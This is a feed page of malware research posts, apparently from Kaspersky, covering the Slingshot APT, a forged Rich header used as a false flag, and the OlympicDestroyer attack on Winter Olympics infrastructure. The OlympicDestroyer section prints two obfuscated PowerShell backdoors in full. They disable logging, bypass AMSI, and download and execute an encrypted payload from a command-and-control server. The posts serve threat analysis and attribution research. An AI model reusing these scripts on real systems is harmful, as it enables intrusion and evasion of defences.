Malware Alerts

Subscribe to Malware Alerts feed Malware Alerts
Online headquarters of Kaspersky Lab security experts.
Updated: 5 hours 45 min ago

The Slingshot APT FAQ

Fri, 03/09/2018 - 10:20

While analysing an incident which involved a suspected keylogger, we identified a malicious library able to interact with a virtual file system, which is usually the sign of an advanced APT actor. This turned out to be a malicious loader internally named ‘Slingshot’, part of a new, and highly sophisticated attack platform that rivals Project Sauron and Regin in complexity.

The initial loader replaces the victim´s legitimate Windows library ‘scesrv.dll’ with a malicious one of exactly the same size. Not only that, it interacts with several other modules including a ring-0 loader, kernel-mode network sniffer, own base-independent packer, and virtual filesystem, among others.

While for most victims the infection vector for Slingshot remains unknown, we were able to find several cases where the attackers got access to Mikrotik routers and placed a component downloaded by Winbox Loader, a management suite for Mikrotik routers. In turn, this infected the administrator of the router.

We believe this cluster of activity started in at least 2012 and was still active at the time of this analysis (February 2018).

Why did you call the intruder Slingshot?

The name appears unencrypted in some of the malicious samples – it is the name of one of the threat actor’s components, so we decided to extend it to the APT as a whole.

When was Slingshot active?

The earliest sample we found was compiled in 2012 and the threat was still active in February 2018.

How did the threat attack and infect its victims?

Slingshot is very complex and the developers behind it have clearly spent a great deal of time and money on its creation. Its infection vector is remarkable – and, to the best of our knowledge, unique.

We believe that most of the victims we observed appeared to have been initially infected through a Windows exploit or compromised Mikrotik routers.

How exactly does infection happen?

The exact method used by Slingshot to exploit the routers in the first instance is not yet clear. When the target user runs Winbox Loader software (a utility used for Mikrotik router configuration), this connects to the router and downloads some DLLs (dynamic link libraries) from the router’s file system.

One of them – ipv4.dll – has been placed by the APT with what is, in fact, a downloader for other malicious components. Winbox Loader downloads this ipv4.dll library to the target’s computer, loads it in memory and runs it.

This DLL then connects to a hardcoded IP and port (in every cases we saw it was the router’s IP address), downloads the other malicious components and runs them.

To run its code in kernel mode in the most recent versions of operating systems, that have Driver Signature Enforcement, Slingshot loads signed vulnerable drivers and runs its own code through their vulnerabilities. .

Following infection, Slingshot would load a number of modules onto the victim device, including two huge and powerful ones: Cahnadr, the kernel mode module, and GollumApp, a user mode module. The two modules are connected and able to support each other in information gathering, persistence and data exfiltration.

The most sophisticated module is GollumApp. This contains nearly 1,500 user-code functions and provides most of the above described routines for persistence, file system control and C&C communications.

Canhadr, also known as NDriver, contains low-level routines for network, IO operations and so on. Its kernel-mode program is able to execute malicious code without crashing the whole file system or causing Blue Screen – a remarkable achievement. Written in pure C language, Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions, and carries out integrity control of various system components to avoid debugging and security detection.

Are Mikrotik the only affected routers?

Some victims may have been infected through other routes. During our research we also found a component called KPWS that turned out to be another downloader for Slingshot components.

Did you inform the affected vendor?

Although the available intelligence is limited and we are not sure what kind of exploit was used to infect routers, we provided Mikrotik with all information available.

What can users of Mikrotik routers do to protect themselves?

Users of Mikrotik routers should upgrade to the latest software version as soon as possible to ensure protection against known vulnerabilities. Further, Mikrotik Winbox no longer downloads anything from the router to the user’s computer.

What are the advantages of achieving kernel mode?

It gives intruders complete control over the victim computer. In kernel mode malware can do everything. There are no restrictions, no limitations, and no protection for the user (or none that the malware can’t easily bypass).

What kind of information does Slingshot appear to be looking for?

Slingshot’s main purpose seems to be cyber-espionage. Analysis suggests it collects screenshots, keyboard data, network data, passwords, USB connections, other desktop activity, clipboard and more, although its kernel access means it can steal whatever it wants.

But with full access to the kernel part of the system, it can steal whatever it wants – credit card numbers, password hashes, social security account numbers – any type of data.

How did Slingshot avoid detection?

The threat actor combined a number of known approaches to protect it very effectively from detection: including encrypting all strings in its modules, calling system services directly in order to bypass security-product hooks, using a number of Anti-bug techniques, and more.

Further, it can shut down its components, but ensure they complete their tasks before closing. This process is triggered when there are signs of an imminent in-system event, such as a system shutdown, and is probably implemented to allow user-mode components of the malware to complete their tasks properly to avoid detection during any forensic research.

You said that it disables disk defragmentation module in Windows OS. Why?

This APT uses its own encrypted file system and this can be located among others in an unused part of a hard drive. During defragmentation, the defrag tool relocates data on disk and this tool can write something to sectors where Slingshot keeps its file systems (because the operating system thinks these sectors are free). This will damage the encrypted file system. We suspect that Slingshot tries to disable defragmentation of these specific areas of the hard drive in order to prevent this from happening.

How does it exfiltrate data?

The malware exfiltrates data through standard networks channels, hiding the traffic being extracted by hooking legitimate call-backs, checking for Slingshot data packages and showing the user (and users’ programs like sniffers and so on) clear traffic without exfiltrated data.

Does it use exploits to zero-day vulnerabilities? Any other exploits?

We haven’t seen Slingshot exploit any zero-days, but that doesn’t mean that it doesn’t – that part of a story is still unclear for us. But it does exploit known vulnerabilities in drivers to pass executable code into kernel mode. These vulnerabilities include CVE-2007-5633; CVE-2010-1592, CVE-2009-0824.

What is the victim profile and target geography?

So far, researchers have seen around 100 victims of Slingshot and its related modules, located in Kenya, Yemen, Afghanistan, Libya, Congo, Jordan, Turkey, Iraq, Sudan, Somalia and Tanzania. Most of the victims appear to be targeted individuals rather than organizations, but there are some government organizations and institutions. Kenya and the Yemen account for most of the victims observed to date.

What do we know about the group behind Slingshot?

The malicious samples investigated by the researchers were marked as ‘version 6.x’, which suggests the threat has existed for a considerable length of time. The development time, skill and cost involved in creating Slingshot’s complex toolset is likely to have been extremely high. Taken together, these clues suggest that the group behind Slingshot is likely to be highly organized and professional and probably state-sponsored.

Text clues in the code suggest it is English-speaking. Some of the techniques used by Slingshot, such as the exploitation of legitimate, yet vulnerable drivers has been seen before in other malware, such as White and Grey Lambert. However, accurate attribution is always hard, if not impossible to determine, and increasingly prone to manipulation and error.

Read more in our technical paper.

The devil’s in the Rich header

Thu, 03/08/2018 - 12:00

In our previous blog, we detailed our findings on the attack against the Pyeongchang 2018 Winter Olympics. For this investigation, our analysts were provided with administrative access to one of the affected servers, located in a hotel based in Pyeongchang county, South Korea. In addition, we collected all available evidence from various private and public sources and worked with several companies to investigate the command and control (C&C) infrastructure associated with the attackers.

During this investigation, one thing stood out – the attackers had pretty good operational security and made almost no mistakes. Some of our colleagues from other companies pointed out similarities with Chinese APT groups and Lazarus. Yet, something about these potential connections didn’t quite add up. This made us look deeper for more clues.

The attackers behind OlympicDestroyer employed several tricks to make it look similar to the malicious samples attributed to the Lazarus group. The main module of OlympicDestroyer carries five additional binaries in its resources, named 101 to 105 respectively. It is already known that resources 102 and 103, with the internal names ‘kiwi86.dll’ and ‘kiwi64.dll’ share considerable amounts of code with other known malware families only because they are built on top of the Mimikatz open-source tool. Resource 105, however is much more interesting in terms of attribution.

Resource 105 is the ‘wiper’ component of OlympicDestroyer. This binary launches a destructive attack on the victim’s network; it removes shadow copy backups, traverses the shared folders on the networks and deletes files. Anyone familiar with the wipers attributed to the Lazarus group will find strong similarities in the file deletion routines:

File deletion routines.
To the left 3c0d740347b0362331c882c2dee96dbf (OlympicDestroyer), on the right 1d0e79feb6d7ed23eb1bf7f257ce4fee (BlueNoroff by Lazarus).

Both functions do essentially the same thing: they delete the file by wiping it with zeroes, using a 4096 bytes memory block. The minor difference here is that the original Bluenoroff routine doesn’t just return after wiping the file, but also renames it to a new random name and then deletes it. So, the similar code may be considered as no more than a weak link.

A much more interesting discovery appeared when we started looking for various kinds of metadata of the PE file. It turned out that that the wiper component of OlympicDestroyer contained the exact ‘Rich’ header that appeared previously in Bluenoroff samples.

MZ DOS and Rich headers of both files (3c0d740347b0362331c882c2dee96dbf – OlympicDestroyer, 5d0ffbc8389f27b0649696f0ef5b3cfe – BlueNoroff) are exactly the same.

This provided us with an interesting clue: if files from both the OlympicDestroyer and Bluenoroff families shared the same Rich header it meant that they were built using the same environment and, having already found some similarities in the code, this could have meant that there is a real link between them. To test this theory, we needed to investigate the contents of the Rich header.

The Rich header is an undocumented structure that appears in most of the PE files generated with the ‘LINK.EXE’ tool by Microsoft. Effectively, any binary built using the standard Microsoft Visual Studio toolset contains this header. There is no official documentation describing this structure, but there is enough public information that can be found on the internet, and there is also the LINK.EXE itself that can be reverse engineered. So, what is a Rich header?

A Rich header is a structure that is written right after the MZ DOS header. It consists of pairs of 4-byte integers. It starts with the magic value, ‘DanS’ and ends with a ‘Rich’ followed by a checksum. And it is also encrypted using a simple XOR operation using the checksum as the key. The data between the magic values encodes the ‘bill of materials’ that were collected by the linker to produce the binary.

Offset First value Second value Description 00 44 61 6E 53 (“DanS”) 00 00 00 00 Beginning of the header 08 00 00 00 00 00 00 00 00 Empty record 10 Tool id, build version Number of items Bill of materials record #1 …       … 52 69 63 68 “Rich” Checksum / XOR key End of the header

The first value of each record is a tool identifier: the unique number of the tool (‘C++ compiler’, ‘C compiler’, ‘resource compiler’, ‘MASM’, etc.), a Visual Studio specific, and the lowest 16 bits of the build number of the tool. The second value is a little-endian integer that is a number of items that were produced by the tool. For example, if the application consists of three source C++ files, there will be a record with a tool id corresponding to the C++ compiler, and the item count will be exactly ‘3’.

The Rich header in OlympicDestroyer’s wiper component can be decoded as follows:

Raw data Type Count Produced by ======================================================== 000C 1C7B 00000001 oldnames 1 12 build 7291 000A 1F6F 0000000B cobj 11 VC 6 (build 8047) 000E 1C83 00000005 masm613 5 MASM 6 (build 7299) 0004 1F6F 00000004 stdlibdll 4 VC 6 (build 8047) 005D 0FC3 00000007 sdk/imp 7 VC 2003 (build 4035) 0001 0000 0000004D imports 77 imports (build 0) 000B 2636 00000003 c++obj 3 VC 6 (build 9782)

It is a typical example of a header for a binary created with Visual Studio 6. The ‘masm613’ items were most likely taken from the standard runtime library, while the items marked as ‘VC 2003’ correspond to libraries imported from a newer Windows SDK – the code uses some Windows API functions that were missing at the time VC 6 was released. So, basically it looks like a C++ application having three source code files and using a slightly newer SDK to link the Windows APIs. The description perfectly matches the contents of the Bluenoroff sample that has the same Rich header (i.e. 5d0ffbc8389f27b0649696f0ef5b3cfe).

We get very different results when trying to check the validity of the Rich header’s entries against the actual contents of OlympicDestroyer wiper’s component. Even a quick visual inspection of the file shows something very unusual for a file created with Visual Studio 6: references to ‘mscoree.dll’ that did not exist at the time.

References to “mscoree.dll” and error messages typical for the MSVC libraries

After some experimentation and careful comparison of binaries generated by different versions of Visual Studio, we can name the actual version of Studio that was used: it is Visual Studio 2010 (MSVC 10). Our best proof is the code of the ___tmainCRTStartup function that is only produced with the runtime library of MSVC 10 (DLL runtime) using default optimizations.

Beginning of the disassembly of the ___tmainCRTStartup function of the OlympicDestroyer’s wiper component, 3c0d740347b0362331c882c2dee96dbf

It is not possible that the binary was produced with a standard linker and was built using the MSVC 2010 runtime, having the 2010’s startup code invoking the WinMain function and at the same time did not have any Rich records referring to VC/VC++ 2010. At the same time, it could not have the same number of Rich records for the VC6 code that is missing from the binary!

A binary produced with Visual Studio 2010 and built from the same code (decompiled), having the same startup code and almost identical to the wiper’s sample will have a Rich header that is totally different:

Raw data Type Count Produced by ================================================================ 009E 9D1B 00000008 masm10 8 VC 2010 (build 40219) 0093 7809 0000000B sdk/imp 11 VC 2008 (build 30729) 0001 0000 00000063 imports 99 imports (build 0) 00AA 9D1B 0000003A cobj 58 VC 2010 (build 40219) 00AB 9D1B 0000000E c++obj 14 VC 2010 (build 40219) 009D 9D1B 00000001 linker 1 157 build 40219

The only reasonable conclusion that can be made is that the Rich header in the wiper was deliberately copied from the Bluenoroff samples; it is a fake and has no connection with the contents of the binary. It is not possible to completely understand the motives of this action, but we know for sure that the creators of OlympicDestroyer intentionally modified their product to resemble the Bluenoroff samples produced by the Lazarus group.

The forgotten sample

During the course of our investigation, we came across a sample that further consolidates the theory of the Rich header false flag from Lazarus.

The sample, 64aa21201bfd88d521fe90d44c7b5dba was uploaded to a multi-scanner service from France on 2018-02-09 13:46:23, as ‘olymp.exe’. This is a version of the wiper malware described above, with several important changes:

  • The 60 minutes delay before shutdown was removed
  • Compilation timestamp is 2018-02-09 10:42:19
  • The Rich header appears legit

The removal of the 60 minutes’ delay indicates the attackers were probably in a rush and didn’t want to wait before shutting down the systems. Also, if true, the compilation timestamp 2018-02-09 10:42:19 puts it right after the attack on the Pyeonchang hotels, which took place at around 9:00 a.m. GMT. This suggests the attackers compiled this ‘special’ sample after the wiping attack against the hotels and, likely as a result of their hurry, forgot to fake the Rich header.


The existence of the fake Rich header from Lazarus samples in the new OlympicDestroyer samples indicates an intricate false flag operation designed to attribute this attack to the Lazarus group. The attackers’ knowledge of the Rich header is complemented by their gamble that a security researcher would discover it and use it for attribution. Although we discovered this overlap on February 13th, it seemed too good to be true. On the contrary, it felt like a false flag from the beginning, which is why we refrained from making any connections with previous operations or threat actors. This newly published research consolidates the theory that blaming the Lazarus group for the attack was parts of the attackers’ strategy.

We would like to ask other researchers around the world to join us in investigating these false flags and attempt to discover more facts about the origin of OlympicDestroyer.

If you would like to read more about Rich header, we can recommend a nice presentation on this from George Webster and Julian Kirsch or Technical University of Munich.


3c0d740347b0362331c882c2dee96dbf – wiper with the fake Lazarus Rich header
64aa21201bfd88d521fe90d44c7b5dba – wiper the original Rich header and no delay before shutdown

OlympicDestroyer is here to trick the industry

Thu, 03/08/2018 - 12:00

A couple of days after the opening ceremony of the Winter Olympics in Pyeongchang, South Korea, we received information from several partners, on the condition of non-disclosure (TLP:Red), about a devastating malware attack on the Olympic infrastructure. A quick peek inside the malware revealed a destructive self-modifying password-stealing self-propagating malicious program, which by any definition sounds pretty bad.

According to media reports, the organizers of the Pyeongchang Olympics confirmed they were investigating a cyberattack that temporarily paralyzed IT systems ahead of official opening ceremonies, shutting down display monitors, killing Wi-Fi, and taking down the Olympics website so that visitors were unable to print tickets. We also found other attempts to wreak havoc at companies working closely with the Winter Olympics.

Malware features

Several files related to the cyberattack were uploaded to VirusTotal on the day of the attack and were quickly picked up by other security researchers. As we were researching this attack, the Cisco Talos team published a brief description of the malware which Talos got from an undisclosed source. In their blog Talos highlighted some similarities between the attack, Netya (Expetr/NotPetya) and BadRabbit (targeted ransomware).

The Talos publication effectively removed the TLP constraint as the information had now become public and could be referenced in this way. However, we decided not to jump to conclusions, especially with regards to attribution, and spent time researching it calmly and methodologically, while we continued to discover more and more false flags and controversies in the malware.

The main malware module is a network worm that consists of multiple components, including a legitimate PsExec tool from SysInternals’ suite, a few credential stealer modules and a wiper. From a technical perspective, the purpose of the malware is to deliver and start the wiper payload which attempts to destroy files on the remote network shares over the next 60 minutes. Meanwhile, the main module collects user passwords from browser and Windows storage and crafts a new generation of the worm that contains old and freshly collected compromised credentials. The new generation of the worm is pushed to accessible local network computers and starts using the PsExec tool, leveraging the collected credentials and current user privileges.

Once the wiper has run for 60 minutes it cleans Windows event logs, resets backups, deletes shadow copies from the file system, disables the recovery item in the Windows boot menu, disables all the services on the system and reboots the computer. Those files on the network shares that it managed to wipe within 60 minutes remain destroyed. The malware doesn’t use any persistence and even contains protection (also a killswitch) against recurring reinfection. Incidentally, only 1MB of the remote files are fully overwritten with zeroes; larger files were wiped with just 1K of zeroes in the header. The local files are not destroyed and the worm doesn’t wipe itself or its components.

Fig.1 OlympicDestroyer component relations

Reconnaissance stage

Several companies have blogged about OlympicDestroyer’s attribution, it’s features and propagation method, but no one has discovered how exactly it was launched and from where. That’s where we had a little bit more luck.

Since December 2017 security researchers have been seeing samples of MS Office documents in spearphishing emails related to the Winter Olympics uploaded to VirusTotal. The documents contained nothing but slightly formatted gibberish to make it look like the text had an encoding problem, encouraging the user to press a button to “Enable Content”.

Fig.2 Screenshot of attachment from a spearphishing email.

When the victim “enables content”, the document starts a cmd.exe with a command line to execute a PowerShell scriptlet that, in turn, downloads and executes a second stage PowerShell scriptlet and, eventually, backdoors the system. The only apparent links between this email campaign and OlympicDestroyer would have been the target, however, we managed to discover a couple of connections between this weaponized document and the attack in Pyeongchang which makes us believe they are related.

For this investigation, our analysts were provided with administrative access to one of the affected servers located in a hotel based in Pyeongchang county, South Korea. A triage analysis was conducted on this Windows server system. The affected company also kindly provided us with the network connections log from their network gateway. Thanks to this, we confirmed the presence of malicious traffic to a malicious command and control server at IP 131.255.*.* which is located in Argentina. The infected host established multiple connections to this server on ports from the following list:

  • 443
  • 4443
  • 8080
  • 8081
  • 8443
  • 8880

The server in Argentina was purchased from a reseller company in Bulgaria, which kindly assisted us in this investigation. The company shared that the server was purchased from Norway, by a person using a Protomail account:

Name: Simon ***

Email: simon***

Last Login Date: 2018-02-07 16:09

IP Address: 82.102.*.* (Norway)

Server purchased on: 2017-10-10

We were able to further connect this to a suspicious looking domain, with a registration address and phone number from Sweden:

Domain: microsoft******[.]com

Registration name: Elvis ****

Email: elvis***

Registration date: 2017-11-28

Before getting suspended in December 2017 for failing the ICANN email verification check, the domain registration was privacy-protected. This shielded the registration data, except the DNS servers, which indicate it was purchased via MonoVM, a VPS for a bitcoin provider:

  • Name Server:[.]com
  • Name Server: monovm.mars.orderbox-dns[.]com
  • Name Server: monovm.mercury.orderbox-dns[.]com
  • Name Server: monovm.venus.orderbox-dns[.]com

Name server history:

Fig.3 Name server history for microsoft*****.com

This email popped up as a contact detail for a small network inside the 89.219.*.* range that is located in Kazakhstan. This is where the trail ends for now. We apologize for not disclosing the full information as we would like to avoid random interactions with this contact. Full information has been provided to law enforcement agencies and customers subscribed to our APT Intel reporting service.

To manage the server in Argentina, Simon *** used the IP address in Norway (82.102.*.*). This is the gateway of a VPN service known as NordVPN ( that offers privacy-protected VPN services for bitcoins.

It’s not the first time the name NordVPN has cropped up in this case. We previously saw a weaponized Word document used in spearphishing emails targeting the Winter Olympics that contained something that looked like garbage text taken from a binary object (e.g. pagefile or even raw disk). However, part of the random data included two clearly readable text strings (highlighted below) that made it into the document (md5: 5ba7ec869c7157efc1e52f5157705867) for no obvious reason:

Fig. 4 A reference to NordVPN openvpn config file

Of course, this is a low confidence indicator, but seems to be another link between the spearphishing campaign on the Winter Olympics and the attackers responsible for launching the OlympicDestroyer worm. In addition, this document includes a PowerShell command that closely resembles the PowerShell backdoor found in the network of the OlympicDestroyer victim. A comparison of this code is available below.

The PowerShell scripts listed below were used in the weaponized documents and as standalone backdoors. As standalone fileless backdoors, they were built and obfuscated using the same tool. Both scripts use a similar URL structure and both implement RC4 in PowerShell, as well as using a secret key passed to the server in base64 via cookies.

Spearphishing case in South Korea Powershell found on OlympicDestroyer victim ( gCi VariABLE:FzS3AV )."VaLUE"::"expecT100cOnTiNUe"=0; ${wC}=^&NEW-ObjecT System.Net.Webclient;${u}=Mozilla/5.0 (Windows NT 6.1;WOW64; Trident/7.0; rv:11.0)like Gecko; ( GCI VARiabLe:fZS3aV )."vAlUe"::"seRVeRCeRTiFICaTEVALIDATIoNCALlbAck" = {${tRUE}}; ${wC}."hEADERs".Add.Invoke(User-Agent,${U}); ${WC}."PROXy"= ( variaBLe ("fX32R") -VAlUeO )::"DefaultWebProxy"; ${wc}."pRoxY"."CREdENtials" = ( GET-vaRiABle ('hE7KU'))."VAlue"::"dEFauLTNeTWOrkCREdENTIALs"; ${K}= $XNLO::"asCiI".GetBytes.Invoke(5e2988cfc41d844e2114dceb8851d0bb); ${R}= { ${D},${K}=${ArGs}; ${s}=0..255;0..255^|^&('%') { ${j}=(${j}+${s}[${_}]+${k}[${_}%${K}."couNt"])%256; ${s}[${_}],${S}[${J}]=${s}[${J}],${S}[${_}] }; ${d}^|^&('%') { ${I}=(${I}+1)%256; ${h}=(${H}+${s}[${I}])%256; ${S}[${I}],${s}[${H}]=${s}[${H}],${S}[${I}]; ${_}-BxoR${S}[(${s}[${I}]+${S}[${H}])%256]} }; ${Wc}."hEadeRS".Add.Invoke(cookie,session=ABWjqj0NiqToVn0TW2FTlHIAApw=); ${SER}=https://minibo***[.]cl:443; ${T}=/components/com_tags/controllers/default_tags.php; ${dATa}=${Wc}.DownloadData.Invoke(${seR}+${T}); ${IV}=${DATA}[0..3]; ${dAta}=${DaTA}[4..${dAtA}.length]; -jOin[ChaR[]](^& ${R} ${DAtA} (${IV}+${K}))^|.IEX &&SeT RMN=ecHo InvoKe-expRESsIon ([ENVirOnMeNt]::gETeNvIroNMENTvarIaBlE('svTI','procEsS')) ^| pOWErshEll -NOnint -wiNdOWSt hiddeN -NoEXiT -NoprOFilE -ExECuTiONPOLIcy bYpASs - && CMd.exE /c%Rmn% If($PSVERsIoNTAbLe.PSVeRsIon.MAJOR -Ge 3){$GPS=[ReF].ASSEmbly.GETTYPE('System.Management.Automation.Utils')."GeTFie`Ld"('cachedGroupPolicySettings','N'+'onPublic,Static').GEtVALUe($NulL); If($GPS['ScriptB'+'lockLogging']){$GPS['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0; $GPS['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}ElSE{[ScriptBlOcK]."GeTFiE`Ld"('signatures','N'+'onPublic,Static').SETValUE($NUlL,(New-ObJecT CoLLectIOnS.GeNeRIC.HAshSet[stRing]))}[ReF].AssEmbLY.GETTYPe('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GEtField('amsiInitFailed','NonPublic,Static').SEtVALue($nULL,$TRuE)}; }; [SYStem.NeT.SerVicePoinTMANAGeR]::EXPeCt100ConTINuE=0; $wC=NeW-ObJect SySTem.NEt.WEBClIeNT; $u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'; $Wc.HEADErS.Add('User-Agent',$u); $wC.ProXY=[SYsTeM.NET.WeBREqUesT]::DEFAUltWebPROXY; $wC.PROxY.CredentIAlS = [SYsTem.NEt.CRedeNTialCacHe]::DeFAuLTNeTwoRKCredeNtiAls; $Script:Proxy = $wc.Proxy; $K=[SysTEM.Text.ENcOding]::ASCII.GETBYTes('94+K/L3OE?o@qRl>.:FPev7rtNb^|#im'); $R= { $D,$K=$ARgs; $S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COuNt])%256; $S[$_],$S[$J]=$S[$J],$S[$_]}; $D|% { $I=($I+1)%256; $H=($H+$S[$I])%256; $S[$I],$S[$H]=$S[$H],$S[$I]; $_-bxor$S[($S[$I]+$S[$H])%256] } }; $ser='http://131.255.*.*:8081'; $t='/admin/get.php'; $wc.HeAders.Add("Cookie","session=zt8VX24Knnzen8pNvhPl1xJ2E5s="); $daTA=$WC.DownlOADDATA($ser+$t); $iV=$DATa[0..3]; $datA=$dATa[4..$data.leNgth]; -joiN[CHAR[]](& $R $dAta ($IV+$K))|IEX Lateral movement

Despite the network worm’s self-replicating feature, the attackers did some manual lateral movement before starting on the destructive malware. We believe this was done to look for a better spot to release the worm. They seemed to be moving through the network via Psexec and stolen credentials, opening a default meterpreter port (TCP 4444) and downloading and running a backdoor (meterpreter). The attackers also checked the network configuration, potentially searching for servers attached to multiple networks or VPN links in order to penetrate adjacent networks that could be linked to the Olympic Committee infrastructure.

One of the hosts in the network of the affected ski resort hotel had Kaspersky Lab’s system watcher component enabled, which collected quite a few of the artifacts used by the attackers for lateral movement. According to the telemetry from this host, the attackers entered the system on 6 February, 2018. They used three types of PowerShell scriptlets: TCP 4444 port opener, ipconfig launcher and a downloader.

Based on telemetry we received from one of the hosts, we built a timeline of the attackers’ activity and a histogram showing when the attackers started executables on the system.

Fig.5 Histogram with attacker activity per hour of day

From this we can see that the attackers were mostly busy outside of office hours according to Korean Standard Time (UTC+9), perhaps to attract less attention or simply due to their own timezone.

Worm propagation

OlympicDestroyer is a network worm that collects user credentials with hostnames. New data is appended to the end of an existing collection. Having multiple samples of the worm from different networks allows us to reconstruct the path of the worm and find the source of distribution (or at least its hostname and list of users).

Fig.6 OlympicDestroyer worm propagation

The diagram above was built based on extracted lists of credentials with hostnames and some alleged roles of the servers based on respective names. We can see there were at least three independent launch pads for the worm: company, ski resort hotels, and the server.

At some point, samples with a list of credentials were uploaded to VirusTotal where they were found by security researchers that executed the worm in a sandbox environment and uploaded the new generation on VirusTotal again. There are a number of samples on VT that contain credentials from those sandbox machines. Nevertheless, it’s clear the network worm wasn’t started there initially, but was instead coming from one of the known launch pads.


Spearphishing emails were used to target the networks of official partners of the Winter Olympics. The attackers probably went to the official website to find out the names of the partner companies, figured out their domain names, collected known email addresses and started bombarding them with spearphishes.

One of these weaponized documents was uploaded to VT from South Korea on 29 December, 2017 inside an email file (6b728d2966194968d12c56f8e3691855). The sender address imitates the South Korean NCTC (National Counter-Terrorism Center), while the sender’s server IP originates from a server in Singapore.

Fig.7 Fake sender address.

The email appears to have been sent to icehockey@pyeongchang2018[.]com. However, the real targets are in the following list:

Industry Target Company/Organization Domain Government organization Enterprise Energy Semiconductor Transport Hospital Media Advertising (LED display company) (LED Panel Advertising company email) Resort/Hotel

The attackers appear to have got sloppy when they searched for email addresses that ended with those targeted domains. Using short domain names such as or wasn’t a good idea. This went unnoticed and a few totally unrelated companies with domain names ending with and received spearphishing emails:

  • krovy-com (Wood company in Slovakia)
  • okc-com (Mining-related company in Canada)
  • bcel-com (Finance company in Laos)
  • kuhlecom (Software company in Australia)
  • wertprojecom (Real estate company in Germany)

Based on all the evidence we discovered, the following networks seem to have been breached in the attack:

  • Software vendor responsible for automation at ski resorts
  • Two ski resort hotels in South Korea
  • IT service provider ( headquartered in France
  • com attached network

Considering the malware was spread as a network worm via Windows network shares, collateral damage was inevitable. Through one of the victims who uploaded the dropper file to VT from Austria, we were able to extract the hostname from the stolen credentials stored in the malware: ATVIES2BQA. While it may look like a random sequence of characters at first glance, we speculate that AT stands for the host country code (Austria) which matches the submitter source country, followed by the organization name “VIES” with some extra random characters uniquely identifying the host. According to OSINT, there is only one large organization that matches this name in Austria – the VAT Information Exchange System used throughout the European Union. VIES is a search engine owned by the European Commission. So, it’s either a compromised host of Atos which role is to communicate with the Austrian VIES or the Austrian VIES indeed is indeed in collateral damage of the malware’s network propagation.

But the main outbreak of the worm that we investigated was at a hotel in a South Korean winter resort. The hotel didn´t upload any samples to VT, which is why it remained unknown. We assume many other companies attacked in South Korea did the same, which reduced the visible surface of the attacked infrastructure.

While we cannot name the hotel chain, we can say that one of its hotels located in a ski resort in Pyeongchang was subjected to an attack. Despite the close proximity to the Olympic Games, the resort was not one of the official winter parks staging the games. However, it is definitely part of the surrounding infrastructure that hosted numerous guests and possibly even sports teams competing at the Olympics. In an interview with the owners, we found out that the malware disabled ski gates and ski lifts that were operated from one of the attacked servers. Our analysis showed that this was not collateral damage. The attackers deliberately chose to start the spread of the destructive worm from this dedicated ski resort automation server. That server was the so-called patient-zero in the network. The timing was also chosen to precede the official opening ceremony by a couple of hours, allowing the worm to propagate deep enough into networks to cause maximum inconvenience for those using the affected infrastructure. As a matter of fact, the plan was to let the worm gain better visibility in the news.

Attribution hell

In their blog the Cisco Talos researchers also pointed out that OlympicDestroyer used similar techniques to Badrabbit and NotPetya to reset the event log and delete backups. Although the intention and purpose of both implementations of the techniques are similar, there are many differences in the code semantics. It’s definitely not copy-pasted code and because the command lines were publicly discussed on security blogs, these simple techniques became available to anyone who wants to use them.

Fig.8 Event logs cleaning and disabling system recovery in OlympicDestroyer and NotPetya

Soon after the Talos publication, Israeli company IntezerLabs tweeted that they had found links to Chinese APT groups.

Fig.9 Announcement of connection to Chinese APTs by IntezerLabs on 12 Feb, 2018

IntezerLabs released a blogpost with an analysis of features found using their in-house malware similarity technology.

A few days later media outlets started publishing articles suggesting potential motives and activities by Russian APT groups: “Crowdstrike Intelligence said that in November and December of 2017 it had observed a credential harvesting operation operating in the international sporting sector. At the time it attributed this operation to Russian hacking group Fancy Bear”…”.

On the other hand, Crowdstrike’s own VP of Intelligence, Adam Meyers, in an interview with the media said: “There is no evidence connecting Fancy Bear to the Olympic attack”.

However, a couple of weeks later, the Russian trace was brought up again by the Washington Post, which claimed that Russian military spies were behind the Winter Olympics attack, citing “two U.S. officials who spoke on the condition of anonymity”. Unfortunately, such articles based on anonymous sources contain no verifiable information and bring no real answers – they only spread rumors.

Microsoft’s security team also seems to have been tricked by the malware as their internal detection was triggered on the potential use of EternalRomance exploit (MS17-010).

Fig.10 Microsoft security team claims they found EternalRomance in OlympicDestroyer

A couple of days later Microsoft had to retract those claims as they were simply not confirmed.

Fig.11 Microsoft security team retracts previous claims in a subsequent tweet

The day after we released a private report with forensic findings and detailed analysis of this attribution hell to our APT Intel subscribers (for more information please contact:, the Cisco Talos team decided to revisit OlympicDestroyer and go public with a similar review. We сan’t help but agree with this nice write-up with code comparison, because we came to very similar conclusions.

In addition, Talos researchers noted that the evtchk.txt filename, which the malware used as a potential false-flag during its operation, was very similar to the filenames (evtdiag.exe, evtsys.exe and evtchk.bat) used by BlueNoroff/Lazarus in the Bangladesh SWIFT cyberheist in 2016.

Recorded Future decided to not attribute this attack to any actor; however, they claimed that they found similarities to BlueNoroff/Lazarus LimaCharlie malware loaders that are widely believed to be North Korean actors.

We can’t dispute that part of the code really does resemble the Lazarus code. The wiper modules used in OlympicDestroyer (MD5: 3c0d740347b0362331c882c2dee96dbf) and Bluenoroff (MD5: 5d0ffbc8389f27b0649696f0ef5b3cfe) used similar code to wipe files.

Fig.12 Comparison of wiping module (left: Bluenoroff tool; right: OlympicDestroyer)

There is also a high level of similarity between Lazarus and OlympicDestroyer. There are modules in both campaigns that used the same technique to decrypt a payload in memory using a secret password provided via a command line. Lazarus used this in their malware loaders (Recorded Future also mentions a similarity in malware loader code) to protect their backdoor modules from reverse engineering as they contained some default C2 information.

Despite the resemblance in the method, there are significant differences in its usage:

  1. Lazarus used long and reliable alphanumeric passwords (30+ characters long). OlympicDestroyer on the contrary used a very simple password: “123”.
  2. Lazarus never hardcoded its passwords for protected payloads into the malware body. OlympicDestroyer on the contrary hardcoded it (there was actually no other way, because the worm had to spread itself and run fully autonomously). That’s why the whole idea of using password-protected payloads in the network worm looks ridiculous, and we believe it’s unlikely an actor such as Lazarus would implement techniques like that considering their previous TTPs.

The possibility of North Korean involvement looked way off mark, especially since Kim Jong-un’s own sister attended the opening ceremony in Pyeongchang. According to our forensic findings, the attack was started immediately before the official opening ceremony on 9 February, 2018.

